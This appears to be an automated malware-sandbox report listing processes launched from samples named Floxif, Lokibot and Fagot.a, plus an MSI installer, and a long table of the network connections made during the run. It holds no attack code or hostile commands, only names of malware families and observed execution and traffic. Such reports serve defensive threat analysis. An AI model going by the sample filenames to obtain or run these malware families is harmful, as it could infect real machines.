C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 2756 -ip 2756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 196
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4980 -ip 4980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1088 -ip 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6368 -ip 6368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5200 -ip 5200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 400
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1540 -childID 19 -isForBrowser -prefsHandle 1456 -prefMapHandle 2748 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba015992-3bd2-48c4-abb9-9f8bed97d948} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\BabylonClient12.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding EAE59F16C7B87FAC329C0C1BC8195756 C
C:\Users\Admin\Downloads\Fagot.a.exe
"C:\Users\Admin\Downloads\Fagot.a.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:63787 | tcp | |
| US | 8.8.8.8:53 | www.majorgeeks.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | www.majorgeeks.com | udp |
| US | 8.8.8.8:53 | www.majorgeeks.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.2.81.51.in-addr.arpa | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | api.majorgeeks.com | udp |
| US | 8.8.8.8:53 | api.majorgeeks.com | udp |
| US | 51.81.2.252:443 | api.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | api.majorgeeks.com | udp |
| US | 8.8.8.8:53 | ra.majorgeeks.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | cdn-images.mailchimp.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 18.245.187.103:443 | cdn-images.mailchimp.com | tcp |
| GB | 142.250.187.238:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | dbhkt46el5ri0.cloudfront.net | udp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | ra.majorgeeks.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | ra.majorgeeks.com | udp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 8.8.8.8:53 | dbhkt46el5ri0.cloudfront.net | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| GB | 18.245.187.103:443 | dbhkt46el5ri0.cloudfront.net | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 142.250.187.238:443 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 104.26.3.199:443 | img.buymeacoffee.com | tcp |
| US | 8.8.8.8:53 | img.buymeacoffee.com | udp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | img.buymeacoffee.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 104.26.3.199:443 | img.buymeacoffee.com | udp |
| US | 8.8.8.8:53 | 113.251.11.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.2.81.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.2.81.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| US | 8.8.8.8:53 | majorgeekscom.disqus.com | udp |
| GB | 142.250.178.14:443 | cse.google.com | tcp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| US | 8.8.8.8:53 | prod.disqus.map.fastlylb.net | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| US | 8.8.8.8:53 | prod.disqus.map.fastlylb.net | udp |
| GB | 173.194.76.156:443 | stats.g.doubleclick.net | tcp |
| GB | 173.194.76.156:443 | stats.g.doubleclick.net | tcp |
| GB | 173.194.76.156:443 | stats.g.doubleclick.net | udp |
| GB | 142.250.178.14:443 | cse.google.com | udp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | 156.76.194.173.in-addr.arpa | udp |
| GB | 108.138.217.119:443 | platform-api.sharethis.com | tcp |
| NL | 157.240.201.15:443 | connect.facebook.net | tcp |
| US | 199.232.192.134:443 | prod.disqus.map.fastlylb.net | tcp |
| NL | 157.240.201.15:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | buttons-config.sharethis.com | udp |
| US | 8.8.8.8:53 | l.sharethis.com | udp |
| IE | 34.248.246.129:443 | l.sharethis.com | tcp |
| US | 8.8.8.8:53 | httplogserver-lb.global.unified-prod.sharethis.net | udp |
| US | 8.8.8.8:53 | d2znr2yi078d75.cloudfront.net | udp |
| US | 8.8.8.8:53 | httplogserver-lb.global.unified-prod.sharethis.net | udp |
| US | 8.8.8.8:53 | disqus.com | udp |
| US | 8.8.8.8:53 | d2znr2yi078d75.cloudfront.net | udp |
| US | 151.101.64.134:443 | disqus.com | tcp |
| US | 8.8.8.8:53 | disqus.com | udp |
| US | 8.8.8.8:53 | disqus.com | udp |
| GB | 18.245.143.28:443 | d2znr2yi078d75.cloudfront.net | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | star-mini.c10r.facebook.com | udp |
| US | 8.8.8.8:53 | platform-cdn.sharethis.com | udp |
| US | 8.8.8.8:53 | star-mini.c10r.facebook.com | udp |
| GB | 18.165.201.46:443 | platform-cdn.sharethis.com | tcp |
| GB | 18.165.201.46:443 | platform-cdn.sharethis.com | tcp |
| GB | 18.165.201.46:443 | platform-cdn.sharethis.com | tcp |
| GB | 18.165.201.46:443 | platform-cdn.sharethis.com | tcp |
| US | 8.8.8.8:53 | d3oiwf0xhhk8m1.cloudfront.net | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| GB | 18.165.201.46:443 | d3oiwf0xhhk8m1.cloudfront.net | tcp |
| GB | 18.165.201.46:443 | d3oiwf0xhhk8m1.cloudfront.net | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | d3oiwf0xhhk8m1.cloudfront.net | udp |
| GB | 18.154.84.47:443 | count-server.sharethis.com | tcp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| US | 8.8.8.8:53 | c.disquscdn.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 13.224.132.61:443 | c.disquscdn.com | tcp |
| GB | 13.224.132.61:443 | c.disquscdn.com | tcp |
| GB | 13.224.132.61:443 | c.disquscdn.com | tcp |
| US | 8.8.8.8:53 | d231vab146qzfb.cloudfront.net | udp |
| GB | 172.217.169.14:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | d231vab146qzfb.cloudfront.net | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.192.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.217.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.201.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.246.248.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.64.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.84.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.201.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.132.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.14:443 | www3.l.google.com | udp |
| US | 151.101.64.134:443 | disqus.com | tcp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | referrer.disqus.com | udp |
| US | 8.8.8.8:53 | googlehosted.l.googleusercontent.com | udp |
| GB | 142.250.187.225:443 | googlehosted.l.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | googlehosted.l.googleusercontent.com | udp |
| US | 199.232.196.134:443 | referrer.disqus.com | tcp |
| GB | 142.250.187.225:443 | googlehosted.l.googleusercontent.com | udp |
| US | 199.232.196.134:443 | referrer.disqus.com | tcp |
| N/A | 127.0.0.1:63797 | tcp | |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.196.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.disqus.map.fastlylb.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 142.250.180.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.180.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 142.250.180.2:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.180.1:443 | ep2.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.180.1:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| GB | 108.138.217.119:443 | platform-api.sharethis.com | tcp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| GB | 142.250.187.238:443 | plus.l.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 199.232.196.134:443 | prod.disqus.map.fastlylb.net | tcp |
| US | 8.8.8.8:53 | prod.disqus.map.fastlylb.net | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| GB | 142.250.187.202:443 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| GB | 142.250.187.202:443 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | api.majorgeeks.com | udp |
| GB | 18.245.187.103:443 | dbhkt46el5ri0.cloudfront.net | tcp |
| US | 8.8.8.8:53 | dbhkt46el5ri0.cloudfront.net | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| GB | 172.217.169.14:443 | www3.l.google.com | tcp |
| US | 8.8.8.8:53 | files1.majorgeeks.com | udp |
| US | 51.81.2.249:443 | files1.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | files1.majorgeeks.com | udp |
| US | 8.8.8.8:53 | files1.majorgeeks.com | udp |
| US | 8.8.8.8:53 | 249.2.81.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 71.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| GB | 172.217.169.14:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 88.221.134.155:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.169.14:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r1---sn-aigzrnsr.gvt1.com | udp |
| GB | 74.125.175.38:443 | r1---sn-aigzrnsr.gvt1.com | tcp |
| US | 8.8.8.8:53 | r1.sn-aigzrnsr.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-aigzrnsr.gvt1.com | udp |
| GB | 74.125.175.38:443 | r1.sn-aigzrnsr.gvt1.com | udp |
| US | 8.8.8.8:53 | 38.175.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ocsp.trust-provider.com | udp |
| US | 172.64.149.23:80 | ocsp.trust-provider.com | tcp |
| US | 8.8.8.8:53 | crl.trust-provider.com | udp |
| US | 172.64.149.23:80 | crl.trust-provider.com | tcp |
| US | 8.8.8.8:53 | www.intel.com | udp |
| GB | 23.211.239.194:80 | www.intel.com | tcp |
| US | 8.8.8.8:53 | certificates.intel.com | udp |
| GB | 2.18.190.80:80 | certificates.intel.com | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.239.211.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | 46.34.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | docs.virustotal.com | udp |
| US | 34.117.229.111:443 | docs.virustotal.com | tcp |
| US | 8.8.8.8:53 | cloud.google.com | udp |
| GB | 142.250.200.14:443 | cloud.google.com | tcp |
| US | 8.8.8.8:53 | 111.229.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.238:443 | apis.google.com | tcp |
| GB | 142.250.200.14:443 | cloud.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.187.238:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| GB | 142.250.180.2:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | 42.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.com | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.178.14:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 172.217.169.3:443 | recaptcha.net | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| GB | 172.217.169.3:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | ra.majorgeeks.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| GB | 142.250.187.238:443 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 51.81.2.252:443 | api.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | 2.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
